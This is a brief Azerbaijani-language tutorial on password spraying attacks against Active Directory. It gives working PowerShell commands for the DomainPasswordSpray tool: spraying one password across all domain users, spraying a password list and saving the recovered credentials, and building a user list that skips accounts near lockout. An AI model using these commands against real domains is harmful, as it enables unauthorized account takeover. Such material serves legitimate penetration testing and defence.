Password spray Hücumu təcavüzkarın böyük istifadəçi hovuzu olan sistemə hücum etmək üçün istifadə etdiyi hücum texnikasıdır, kobud güc(brute-force) hücumunun daha təkmil versiyasıdır. Klassik brute force hücumu bir istifadəçi adından dəfələrlə müxtəlif parolları sınamağı nəzərdə tutsa da, Password spray hücumu eyni parolu bir sıra istifadəçi adlarında sınamağı əhatə edir. Bu o deməkdir ki, təcavüzkar bir çox fərqli istifadəçi adından bir neçə ümumi və ya standart parolu sınaya bilər.Bu hücum növündə çox istifadə olunan parolar və ya default olan parolar yoxlanılır.
# Bu əmr AD olan istifadəcilərin hamsına eyni passwordu yoxlayır
Invoke-DomainPasswordSpray -Password <PASSWORD>
# User.txt icində yazılan istifadəciləri passlist.txt faylındakı hər bir parolu yoxlayır
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
#Bu əmr "userlist.txt" faylında bloklanmaq üzrə olan hesablar olmadan domen istifadəçi siyahısını yazacaq.
Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt